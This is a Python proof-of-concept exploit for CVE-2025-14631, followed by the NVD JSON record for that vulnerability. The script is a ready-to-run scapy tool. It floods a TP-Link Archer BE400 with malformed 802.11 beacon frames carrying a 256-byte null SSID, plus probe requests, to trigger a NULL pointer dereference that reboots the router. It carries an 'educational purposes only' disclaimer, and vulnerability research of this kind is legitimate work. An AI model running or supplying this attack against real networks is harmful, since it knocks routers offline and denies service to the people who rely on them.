CVE-2025-14631

#!/usr/bin/env python3 """ CVE-2025-14631 PoC - TP-Link Archer BE400 NULL Pointer Dereference DoS Note: This PoC is for educational and security research purposes only. Author: Security Research """ import sys import socket import struct import time from scapy.all import RadioTap, Dot11, Dot11Beacon, Dot11ProbeReq, Dot11Elt, sendp def create_malicious_frame(bssid, channel): """ Create a malicious 802.11 frame to trigger NULL pointer dereference """ # Construct RadioTap header radio = RadioTap() # Create malicious beacon frame with malformed information elements ssid = "\x00" * 256 # Malformed SSID to trigger vulnerability beacon = RadioTap() / \ Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", \ addr2=bssid, addr3=bssid) / \ Dot11Beacon(cap=0x2104) / \ Dot11Elt(ID="SSID", info=ssid) / \ Dot11Elt(ID="Rates", info=b'\x82\x84\x8b\x96\x0c\x12\x18\x24') / \ Dot11Elt(ID="DSset", info=chr(channel)) return beacon def send_flood_attack(interface, target_mac, channel, duration=30): """ Send flooding attack to trigger NULL pointer dereference in 802.11 module """ print(f"[*] Starting NULL Pointer Dereference attack on {target_mac}") print(f"[*] Target Channel: {channel}") print(f"[*] Attack Duration: {duration} seconds") # Configure monitor mode interface try: from scapy.all import conf conf.iface = interface except: pass start_time = time.time() packet_count = 0 while time.time() - start_time < duration: # Send malformed beacon frames frame = create_malicious_frame(target_mac, channel) sendp(frame, iface=interface, verbose=0) packet_count += 1 # Send probe request frames probe_req = RadioTap() / \ Dot11(type=0, subtype=4, addr1="ff:ff:ff:ff:ff:ff", \ addr2="00:11:22:33:44:55", addr3="ff:ff:ff:ff:ff:ff") / \ Dot11ProbeReq() / \ Dot11Elt(ID="SSID", info="\x00" * 128) sendp(probe_req, iface=interface, verbose=0) packet_count += 1 if packet_count % 100 == 0: print(f"[*] Sent {packet_count} malicious frames...") print(f"[+] Attack completed. Total packets sent: {packet_count}") def main(): if len(sys.argv) < 3: print("Usage: python3 cve-2025-14631-poc.py <interface> <target_mac> [channel] [duration]") print("Example: python3 cve-2025-14631-poc.py wlan0mon 00:11:22:33:44:55 6 30") sys.exit(1) interface = sys.argv[1] target_mac = sys.argv[2] channel = int(sys.argv[3]) if len(sys.argv) > 3 else 6 duration = int(sys.argv[4]) if len(sys.argv) > 4 else 30 print("=" * 60) print("CVE-2025-14631 - TP-Link Archer BE400 NULL Pointer Dereference") print("=" * 60) send_flood_attack(interface, target_mac, channel, duration) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-14631", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-01-07T12:16:55.953", "lastModified": "2026-03-12T19:29:26.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A NULL Pointer Dereference vulnerability in TP-Link Archer BE400 V1(802.11 modules) allows \n\nan adjacent attacker to cause a denial-of-service (DoS) by triggering a device reboot.\n\nThis issue affects Archer BE400: xi 1.1.0 Build 20250710 rel.14914."}, {"lang": "es", "value": "Una vulnerabilidad de desreferencia de puntero NULL en TP-Link Archer BE400 V1 (módulos 802.11) permite a un atacante adyacente causar una denegación de servicio (DoS) al desencadenar un reinicio del dispositivo.\n\nEste problema afecta a Archer BE400: xi 1.1.0 Build 20250710 rel.14914."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_be400_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.1.0", "matchCriteriaId": "EF7F8CFB-8A5E-4FF0-9878-5F1DD950429E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_be400:-:*:*:*:*:*:*:*", "matchCriteriaId": "D6C45AEB-1B3B-4844-81A2-3D12E459C2FA"}]}]}], "references": [{"url": "https://www.tp-link.com/en/support/download/archer-be400/v1/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/us/support/download/archer-be400/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/us/support/faq/4871/", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Vendor Advisory"]}]}}